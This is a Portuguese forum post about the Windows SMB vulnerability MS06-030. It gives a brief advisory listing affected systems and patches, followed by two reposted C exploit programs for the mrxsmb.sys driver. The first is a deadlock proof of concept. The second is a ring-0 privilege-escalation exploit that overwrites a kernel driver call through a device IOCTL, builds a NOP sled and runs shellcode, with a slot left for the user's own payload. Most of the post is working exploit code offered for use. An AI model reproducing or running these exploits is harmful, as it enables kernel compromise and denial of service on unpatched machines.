Microsoft SMB Exploit

[HadeS]

Descrição da Vulnerabilidade:

A manipulação maliciosa do SMB (Server Message Block), presente em algumas versões do Windows, permite que um atacante com acesso ao servidor remoto aumente seus privilégios no sistema, ou até mesmo cause um DoS no servidor SMB.

Para maiores informações: http://www.microsoft.com/technet/security/Bulletin/MS06-030.mspx


Sistemas Vulneráveis:

- Microsoft Windows 2000 Service Pack 4.
- Microsoft Windows XP Service Pack 1 e Microsoft Windows XP Service Pack 2
- Microsoft Windows XP Professional x64 Edition.
- Microsoft Windows Server 2003 e Microsoft Windows Server 2003 Service Pack 1 .
- Microsoft Windows Server 2003 e Microsoft Windows Server 2003 with SP1.
- Microsoft Windows Server 2003 x64 Edition.

Sistemas Imunes:

- Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE) e Microsoft Windows Millennium Edition (Me).


Patches:

- Microsoft Windows 2000 Service Pack 4 - Baixe o patch.
- Microsoft Windows XP Service Pack 1 e Microsoft Windows XP Service Pack 2 - Baixe o patch.
- Microsoft Windows XP Professional x64 Edition - Baixe o patch.
- Microsoft Windows Server 2003 e Microsoft Windows Server 2003 Service Pack 1 - Baixe o patch.
- Microsoft Windows Server 2003 e Microsoft Windows Server 2003 with SP1 - Baixe o patch.
- Microsoft Windows Server 2003 x64 Edition - Baixe o patch.


Exploit:

Code Select Expand

////////////////////////////////////////////////////////////////////////////////
///////// MRXSMB.SYS NtClose DEADLOCK exploit///////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//ONLY FOR EDUCATION PURPOSES
////////////////////////////////////////////////////////////////////////////////
// Rub n Santamarta
// ruben (at) reversemode (dot) com
// http://www.reversemode.com
////////////////////////////////////////////////////////////////////////////////

#include <windows.h>
#include <stdio.h>


#define MAGIC_IOCTL 0x141047


VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}

VOID IamAlive()
{
 DWORD i;
 
 for(i=0;i<0x1000;i++)
 {
  Sleep(1000);
  printf("\rI am a Thread and I am alive [%x]",i);
 }

}


VOID KillMySelf()
{
     
 DWORD junk;
 DWORD *OutBuff;
 DWORD *InBuff;
 BOOL bResult;
 HANDLE hDevice;
 DWORD i;
 
  hDevice = CreateFile("\\\\.\\shadow", FILE_EXECUTE,FILE_SHARE_READ|FILE_SHARE_WRITE,
                      NULL, OPEN_EXISTING, 0, NULL);
                     
  if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 
  OutBuff=(DWORD*)malloc(0x18);
  if(!OutBuff) ShowError();
 
  OutBuff[3]=(DWORD)hDevice;
 
  DeviceIoControl(hDevice,
                  MAGIC_IOCTL,
                  0,0,
                  OutBuff,0x18,
                  &junk,
                  (LPOVERLAPPED)NULL);
  // MAIN THREAD ENDING.
}

int main(int argc, char *argv[])
{
   
 LPTHREAD_START_ROUTINE GoodThread;
 DWORD dwThreadId;
 DWORD bResult;
 GoodThread=(LPTHREAD_START_ROUTINE)IamAlive;
 

  printf("-=[MRXSMB.SYS NtClose Vulnerability POC]=-\n");
  printf("\t(Only for educational purposes)\n");
  printf("..http://www.reversemode.com..\n\n");
  printf("Launching Thread ...");
 
  // PUT YOUR "GOOD" OR "BAD" CODE HERE
  // e.g GoodThread
  CreateThread(NULL,0,GoodThread,0,0,&dwThreadId);
 
   
  printf("Done\n");
  printf("I am going to dissapear,but I will be with you forever\n");
  printf("(..)\n\n");
  KillMySelf(); // Immortal mode "on" ;)
 
  return(1);
}

/* EoF */

Fonte: SecuriTeam, traduzido por HadeS.


HadeS

[HadeS]

Mais um exploit para a falha:

Code Select Expand

// Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
// Tested on XP SP2 && 2K SP4
// Disable ReadOnly Memory protection
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0
// -----------------------------------------------------------------------------------
// ONLY FOR EDUCATIONAL PURPOSES.
// -----------------------------------------------------------------------------------
// Rub n Santamarta.
// www.reversemode.com
// -----------------------------------------------------------------------------------
// OVERVIEW
// -----------------------------------------------------------------------------------
// There are 3 possible values to change in order to adjust the exploit to other versions.
// # XPSP2 (XP Service Pack 2)
// This variable is equal to the File offset of the Call that we are modifying minus 0xC
//. #XPSP2 => 3D88020000 cmp eax,000000288
//. 770B ja .000064BBE --
//. 50 push eax
//. 51 push ecx
//. E812E2FFFF call .000062DCC -- MODIFIED CALL --
// -----------------------------------------------------------------------------------
// #W2KSP4 (Windows 2000 Service Pack 4)
// The same method previosly explained but regarding to Windows 2000 Service Pack 4.
// -----------------------------------------------------------------------------------
// $OffWord
// This variable is defined in CalcJump() Function.
// E812E2FFFF call .000062DCC -- MODIFIED CALL --
// The exploit calculates automatically the relative jump, but we need to provide it
// the 2 bytes following opcode Call(0xE8). In example, as we can see, to test in XP
// OffWord will be equal to 0xE212.
//////////////////////////////////////////////////////////////////////////////////////



#include <windows.h>
#include <stdio.h>


#define XPSP2 0x54BAC
#define W2KSP4 0x50ADD
#define MAGIC_IOCTL 0x141043

typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
         DWORD ,
         LPDWORD);

typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
         LPTSTR lpBaseName,
         DWORD nSize);

VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}

DWORD CalcJump(DWORD BaseMRX,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{

      DWORD SumTemp;
      DWORD IniAddress;
   DWORD i;
   DWORD sumAux;
   DWORD addTemp;
   DWORD OffWord;
   
   if(InXP)
   {
  SumTemp=BaseMRX+XPSP2+0xE;
     OffWord=0xE212;
   }
   else
   {
     SumTemp=BaseMRX+W2KSP4+0xE;
  OffWord=0xa971;
   }
 
 
   for(i=0x4c;i<0xDDDC;i=i+4)
   {
  sumAux=~((i*0x10000)+OffWord);
  addTemp=SumTemp-sumAux;
  if(addTemp>0xE000000 && addTemp<0xF000000){
    IniAddress=addTemp&0xFFFFF000;
    *hValue=i-4;
    *ShellAddr=addTemp;
    break;
  }
   }
   printf("\nINFORMATION \n");
   printf("-----------------------------------------------------\n");
      printf("Patched Driver Call pointing to \t [0x%p]\n",addTemp);
   
      return (IniAddress);
}

int main(int argc, char *argv[])
{
 PENUMDEVICES pEnumDeviceDrivers;
 PGETDEVNAME pGetDeviceDriverBaseName;
 LPVOID arrMods[200],addEx;
 DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0;
 DWORD *OutBuff,*InBuff;
 HANDLE hDevice;
 BOOL InXP;
 CHAR baseName[255];

 CONST CHAR Ring0ShellCode[]="\xCC"; //"PUT YOUR RING0 CODE HERE :)"
 
 if(argc<2)
 {
  printf("\nMRXSMB.SYS RING0 Exploit\n");
  printf("--- Ruben Santamarta ---\n");
  printf("Tested on XPSP2 & W2KSP4\n");
  printf("\nusage> exploit.exe <XP> or <2K>\n");
  exit(1);
 }
 
 if(strncmp(argv[1],"XP",2)==0)
  InXP=TRUE;
 else
  InXP=FALSE;

 pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
             "EnumDeviceDrivers");

 pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
             "GetDeviceDriverBaseNameA");

 pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
 devNum=cb/sizeof(LPVOID);
 printf("\nSearching Mrxsmb.sys Base Address...");

 for(i=1;i<=devNum;i++)
 {
       pGetDeviceDriverBaseName(arrMods[i],baseName,254);
    if((strncmp(baseName,"mrxsmb",6)==0))
    {
       printf("[%x] Found!\n",arrMods[i]);
     BaseMRX=(DWORD)arrMods[i];
    }
 }

 if(!BaseMRX)
 {
  printf("Not Found\nExiting\n\n");
  exit(1);
 }

 addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr);
 OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
 
 if(!OutBuff) ShowError();

 printf("F000h bytes allocated at \t\t [0x%p]\n",addEx);
 printf("Value needed \t\t\t [0x%p]\n",hValue+4);

 InBuff=OutBuff;
 
 printf("Checking Shadow Device...");
 hDevice = CreateFile("\\\\.\\shadow",
                    FILE_EXECUTE,
                    FILE_SHARE_READ|FILE_SHARE_WRITE,
                    NULL,
                    OPEN_EXISTING,
                    0,
                    NULL);
 
 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 printf("[OK]\n");
 
 printf("Querying Device...\n");

 while(OutBuff[3]< hValue)
  {
   DeviceIoControl(hDevice, // "\\.\shadow"
                            MAGIC_IOCTL, // Privileged IOCTL
                            InBuff, 2, // InBuffer, InBufferSize
                            OutBuff, 0x18,// OutBuffer,OutBufferSize
                            &junk, // bytes returned
                            (LPOVERLAPPED) NULL);
 
  printf("\r\t[->]VALUES: (%x)",OutBuff[3]);
  }

  if(InXP)
   Ring0Addr=BaseMRX+XPSP2;
  else
   Ring0Addr=BaseMRX+W2KSP4;
 
  printf("Overwritting Driver Call at[%x]...",Ring0Addr);
  DeviceIoControl(hDevice, // "\\.\shadow"
                            MAGIC_IOCTL, // Privileged IOCTL
                            InBuff, 2, // InBuffer, InBufferSize
                            (LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
                            &junk, // bytes returned
                            (LPOVERLAPPED) NULL);
 
  printf("[OK]\n");
  for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090;
 
  memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode));
 
 
  printf("Sending IOCTL to execute the ShellCode\n");
 
  DeviceIoControl(hDevice, // "\\.\shadow"
                            MAGIC_IOCTL, // Privileged IOCTL
                            InBuff, 2, // InBuffer, InBufferSize
                            OutBuff, 0x18,// OutBuffer,OutBufferSize
                            &junk, // bytes returned
                            (LPOVERLAPPED) NULL);

  dwTemp=CloseHandle(hDevice);
  if(!dwTemp) ShowError();

  dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT);
  if(!dwTemp) ShowError();

  return(1);
}

/* EoF */
HadeS